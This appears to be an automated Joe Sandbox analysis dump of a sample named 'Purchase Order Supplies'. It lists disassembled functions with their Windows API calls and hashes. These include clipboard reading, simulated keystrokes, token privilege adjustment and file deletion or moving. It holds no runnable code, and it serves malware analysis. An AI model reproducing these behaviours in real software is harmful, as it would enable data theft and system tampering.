                          • String ID:
                          • API String ID: 1599653421-0
                          • Opcode ID: 1df1fb303b8a03109aa1c9804cd5fb29e9598c56eb784cf6dfa58094fcce9496
                          • Instruction ID: 05e6759bee339126ba7faa417c46466f0093293731918f8453628f139c1976a1
                          • Opcode Fuzzy Hash: 1df1fb303b8a03109aa1c9804cd5fb29e9598c56eb784cf6dfa58094fcce9496
                          • Instruction Fuzzy Hash: BFD0C9B16902087EFB008761CD06DBB775CD721A81F008661BA06D6491DA649E098570
                          Function 00CCE390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91952
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCE3AA
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID:
                          • API String ID: 1777923405-0
                          • Opcode ID: f0baa59937c9ef9ea4846c731dfb48e6b45eabc05a11c6228c58738b06cf8215
                          • Instruction ID: 90271bf702a37e1e719ea0f5a4ecdd995f6a705dd1a38a6b9dacd229fac3f47f
                          • Opcode Fuzzy Hash: f0baa59937c9ef9ea4846c731dfb48e6b45eabc05a11c6228c58738b06cf8215
                          • Instruction Fuzzy Hash: 2FD01231144260AAFE706B14FC06FC177929B41750F1A4459F581A71E9C7D25C825544
                          Function 00CE6FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID:
                          • API String ID: 530164218-0
                          • Opcode ID: 8e3893afca8a65a3347ba8b2362369e0f62d3a6694e50aaec4cdcb1b1530750e
                          • Instruction ID: 3dac725fd6779545b55ddd318b1d1df5ff350197deddb22cdfd56d486664e9c2
                          • Opcode Fuzzy Hash: 8e3893afca8a65a3347ba8b2362369e0f62d3a6694e50aaec4cdcb1b1530750e
                          • Instruction Fuzzy Hash: 49D067362106149F8B01AB99D844C8577E9FF4D6513018051F509DB331DA21E8559B90
                          Function 00C94FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00D049DA,?,?,00000000), ref: 00C94FC4
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: cbd732f0b8731fc66c550490bce81854b5c99dfa496b23e605c16d0dd4c2dda7
                          • Instruction ID: 5a91a0ebaa25b5a2ec710de861bcdfa76a1ad2f81fdbfd335e7d45933e71c414
                          • Opcode Fuzzy Hash: cbd732f0b8731fc66c550490bce81854b5c99dfa496b23e605c16d0dd4c2dda7
                          • Instruction Fuzzy Hash: FBD0C974640308BFEB00CB90DC46F9A7BBDEB04718F200194FA00A62D0D6F2BE818B65
                          Function 00D04DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: c52d2dc1a1d621623d8658aff65a9f7634e51fb00ec4ace820d7e0eddd88e343
                          • Instruction ID: cd5268646bd32e636c065f0e70828ccfc572f1069032c33c58c86436d8bdbaa7
                          • Opcode Fuzzy Hash: c52d2dc1a1d621623d8658aff65a9f7634e51fb00ec4ace820d7e0eddd88e343
                          • Instruction Fuzzy Hash: 74D012B1500201DBE7349F69E80478AB7E4BF95304F24882DE5D6C2651D7BAE8C2DF12
                          Function 00C950EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(?,?,?,00C950BE,?,00C95088,?,00C9BE3D,00D522E8,?,00000000,?,00C93E2E,?,00000000,?), ref: 00C9510C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 5601d228885557aa09c79f82766620305dcdbb2051b794fc8eb9ffbc721401a3
                          • Instruction ID: 75f74c540a05018327d8afd7a13389cfabfce427c2b540b0be0468f3abef94f4
                          • Opcode Fuzzy Hash: 5601d228885557aa09c79f82766620305dcdbb2051b794fc8eb9ffbc721401a3
                          • Instruction Fuzzy Hash: 4AE0B675400B02DBC6324F1AE808452FBF5FFE13613218A2FD4E582660DBB1559ADB90

                          Non-executed Functions

                          Function 00CFF5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00CFF64E
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFF6AD
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFF6EA
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFF711
                          • SendMessageW.USER32 ref: 00CFF737
                          • _wcsncpy.LIBCMT ref: 00CFF7A3
                          • GetKeyState.USER32(00000011), ref: 00CFF7C4
                          • GetKeyState.USER32(00000009), ref: 00CFF7D1
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFF7E7
                          • GetKeyState.USER32(00000010), ref: 00CFF7F1
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFF820
                          • SendMessageW.USER32 ref: 00CFF843
                          • SendMessageW.USER32(?,00001030,?,00CFDE69), ref: 00CFF940
                          • SetCapture.USER32(?), ref: 00CFF970
                          • ClientToScreen.USER32(?,?), ref: 00CFF9D4
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00CFF9FA
                          • ReleaseCapture.USER32 ref: 00CFFA05
                          • GetCursorPos.USER32(?), ref: 00CFFA3A
                          • ScreenToClient.USER32(?,?), ref: 00CFFA47
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFFAA9
                          • SendMessageW.USER32 ref: 00CFFAD3
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFFB12
                          • SendMessageW.USER32 ref: 00CFFB3D
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CFFB55
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CFFB60
                          • GetCursorPos.USER32(?), ref: 00CFFB81
                          • ScreenToClient.USER32(?,?), ref: 00CFFB8E
                          • GetParent.USER32(?), ref: 00CFFBAA
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFFC10
                          • SendMessageW.USER32 ref: 00CFFC40
                          • ClientToScreen.USER32(?,?), ref: 00CFFC96
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CFFCC2
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFFCEA
                          • SendMessageW.USER32 ref: 00CFFD0D
                          • ClientToScreen.USER32(?,?), ref: 00CFFD57
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CFFD87
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFFE1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 3461372671-4164748364
                          • Opcode ID: bcd178e41a10c96a99bd9d1acf8d253c42bdec8a4e3a4bb44709ade83ea39639
                          • Instruction ID: 6a4521fd8816dd70390b4371cdbe9af6bb64722e88676bf9ca8f7691d2995180
                          • Opcode Fuzzy Hash: bcd178e41a10c96a99bd9d1acf8d253c42bdec8a4e3a4bb44709ade83ea39639
                          • Instruction Fuzzy Hash: 03329B74104309AFDB60DF24C884AAABBA5FF48354F14492DF6A5C72A1DB30DD46CB62
                          Function 00CFA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CFAFDB
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: %d/%02d/%02d
                          • API String ID: 3850602802-328681919
                          • Opcode ID: 0e894547f41b07dd6e14c5989873d2ea256cdf7ae922177b4eb26567e06e0e7d
                          • Instruction ID: bcd5ef803208caa0de311414201b24047188356a0eaf4a0f57591ed83773c90b
                          • Opcode Fuzzy Hash: 0e894547f41b07dd6e14c5989873d2ea256cdf7ae922177b4eb26567e06e0e7d
                          • Instruction Fuzzy Hash: BB12A0B1500318ABEB658F65CC89FFEBBB9EF45310F108119F619DB291DB708A41DB62
                          Function 00CAF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000), ref: 00CAF796
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D04388
                          • IsIconic.USER32(000000FF), ref: 00D04391
                          • ShowWindow.USER32(000000FF,00000009), ref: 00D0439E
                          • SetForegroundWindow.USER32(000000FF), ref: 00D043A8
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D043BE
                          • GetCurrentThreadId.KERNEL32 ref: 00D043C5
                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00D043D1
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00D043E2
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00D043EA
                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00D043F2
                          • SetForegroundWindow.USER32(000000FF), ref: 00D043F5
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0440A
                          • keybd_event.USER32(00000012,00000000), ref: 00D04415
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0441F
                          • keybd_event.USER32(00000012,00000000), ref: 00D04424
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0442D
                          • keybd_event.USER32(00000012,00000000), ref: 00D04432
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0443C
                          • keybd_event.USER32(00000012,00000000), ref: 00D04441
                          • SetForegroundWindow.USER32(000000FF), ref: 00D04444
                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00D0446B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          • Opcode ID: bd18c1adeb240910bdd4818df63e72d5cb69f75f2a556e115d655566573d50ae
                          • Instruction ID: cb1bac6cf52c0c9066f7ec8243b1b30d422d924763e1dc9da078643a46427f5e
                          • Opcode Fuzzy Hash: bd18c1adeb240910bdd4818df63e72d5cb69f75f2a556e115d655566573d50ae
                          • Instruction Fuzzy Hash: A23165B1A403187BEB216B719C49FBF7E6DEB44B50F118015FB05E62D1CBB09D01AAB0
                          Function 00CD6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C931DA
                            • Part of subcall function 00CD7B9F: __wsplitpath.LIBCMT ref: 00CD7BBC
                            • Part of subcall function 00CD7B9F: __wsplitpath.LIBCMT ref: 00CD7BCF
                            • Part of subcall function 00CD7C0C: GetFileAttributesW.KERNEL32(?,00CD6A7B), ref: 00CD7C0D
                          • _wcscat.LIBCMT ref: 00CD6B9D
                          • _wcscat.LIBCMT ref: 00CD6BBB
                          • __wsplitpath.LIBCMT ref: 00CD6BE2
                          • FindFirstFileW.KERNEL32(?,?), ref: 00CD6BF8
                          • _wcscpy.LIBCMT ref: 00CD6C57
                          • _wcscat.LIBCMT ref: 00CD6C6A
                          • _wcscat.LIBCMT ref: 00CD6C7D
                          • lstrcmpiW.KERNEL32(?,?), ref: 00CD6CAB
                          • DeleteFileW.KERNEL32(?), ref: 00CD6CBC
                          • MoveFileW.KERNEL32(?,?), ref: 00CD6CDB
                          • MoveFileW.KERNEL32(?,?), ref: 00CD6CEA
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 00CD6CFF
                          • DeleteFileW.KERNEL32(?), ref: 00CD6D10
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD6D37
                          • FindClose.KERNEL32(00000000), ref: 00CD6D53
                          • FindClose.KERNEL32(00000000), ref: 00CD6D61
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                          • String ID: \*.*
                          • API String ID: 1867810238-1173974218
                          • Opcode ID: b4f74ee53a96d92810f47146f11783629f22e3e62597dd484895d993046a4072
                          • Instruction ID: 32a85bc90c6bc9287d5e0d3dada1769701c913d236fdb579fbcbd000ce113766
                          • Opcode Fuzzy Hash: b4f74ee53a96d92810f47146f11783629f22e3e62597dd484895d993046a4072
                          • Instruction Fuzzy Hash: D3513E72900268BACB21DBA0DC84EDE777DAF09304F4445D7E659E3251EB349B89CF61
                          Function 00CE7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                          Download Yara Rule
                          APIs
                          • OpenClipboard.USER32(00D2DBF0), ref: 00CE70C3
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CE70D1
                          • GetClipboardData.USER32(0000000D), ref: 00CE70D9
                          • CloseClipboard.USER32 ref: 00CE70E5
                          • GlobalLock.KERNEL32(00000000), ref: 00CE7101
                          • CloseClipboard.USER32 ref: 00CE710B
                          • GlobalUnlock.KERNEL32(00000000), ref: 00CE7120
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00CE712D
                          • GetClipboardData.USER32(00000001), ref: 00CE7135
                          • GlobalLock.KERNEL32(00000000), ref: 00CE7142
                          • GlobalUnlock.KERNEL32(00000000), ref: 00CE7176
                          • CloseClipboard.USER32 ref: 00CE7283
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                          • String ID:
                          • API String ID: 3222323430-0
                          • Opcode ID: 5d4de1692b6aab8666bc489a3c850fa6d22e5fb3a889865dc143daab9fcdedbb
                          • Instruction ID: f55a40b118ad82db5f94b8b71b06e541ae051a4e24ffcbf614c9af8a910bff40
                          • Opcode Fuzzy Hash: 5d4de1692b6aab8666bc489a3c850fa6d22e5fb3a889865dc143daab9fcdedbb
                          • Instruction Fuzzy Hash: B251E331208345BBD700EF61DC8AFAE73A9AF84B00F008619F656D22D1DF74D906AB72
                          Function 00CCB9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCBF0F
                            • Part of subcall function 00CCBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCBF3C
                            • Part of subcall function 00CCBEC3: GetLastError.KERNEL32 ref: 00CCBF49
                          • _memset.LIBCMT ref: 00CCBA34
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CCBA86
                          • CloseHandle.KERNEL32(?), ref: 00CCBA97
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CCBAAE
                          • GetProcessWindowStation.USER32 ref: 00CCBAC7
                          • SetProcessWindowStation.USER32(00000000), ref: 00CCBAD1
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CCBAEB
                            • Part of subcall function 00CCB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CCB9EC), ref: 00CCB8C5
                            • Part of subcall function 00CCB8B0: CloseHandle.KERNEL32(?,?,00CCB9EC), ref: 00CCB8D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                          • String ID: $default$winsta0
                          • API String ID: 2063423040-1027155976
                          • Opcode ID: 66b9204eb60cd407683338bc24098465deae792f7b45a6a42f902f1b54ad7ad3
                          • Instruction ID: 05574b5cb5f28eb2cd9efeefec461f504a1fde5f78f7d322c7f47d2cb72ad2f5
                          • Opcode Fuzzy Hash: 66b9204eb60cd407683338bc24098465deae792f7b45a6a42f902f1b54ad7ad3
                          • Instruction Fuzzy Hash: 40813571900209BFDF119FE4CD46EEEBBB9EF08304F148559F925A62A1DB318E15EB21
                          Function 00CE2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,75728FB0,?,00000000), ref: 00CE2065
                          • _wcscmp.LIBCMT ref: 00CE207A
                          • _wcscmp.LIBCMT ref: 00CE2091
                          • GetFileAttributesW.KERNEL32(?), ref: 00CE20A3
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00CE20BD
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CE20D5
                          • FindClose.KERNEL32(00000000), ref: 00CE20E0
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00CE20FC
                          • _wcscmp.LIBCMT ref: 00CE2123
                          • _wcscmp.LIBCMT ref: 00CE213A
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE214C
                          • SetCurrentDirectoryW.KERNEL32(00D43A68), ref: 00CE216A
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE2174
                          • FindClose.KERNEL32(00000000), ref: 00CE2181
                          • FindClose.KERNEL32(00000000), ref: 00CE2191
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1803514871-438819550
                          • Opcode ID: 7d06df9431d05e30e736feb179ef1234af50b8b533c7d05baa84335d5bc21ca4
                          • Instruction ID: 7a2293e13bd9c1008a338a334235f1697e21b9c2487650f00b99a448aaf82025
                          • Opcode Fuzzy Hash: 7d06df9431d05e30e736feb179ef1234af50b8b533c7d05baa84335d5bc21ca4
                          • Instruction Fuzzy Hash: F9319C329003597ECB14ABA5EC49FDE73AD9F09320F144056E921E2190DB74DF89CA75
                          Function 00CFF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • DragQueryPoint.SHELL32(?,?), ref: 00CFF14B
                            • Part of subcall function 00CFD5EE: ClientToScreen.USER32(?,?), ref: 00CFD617
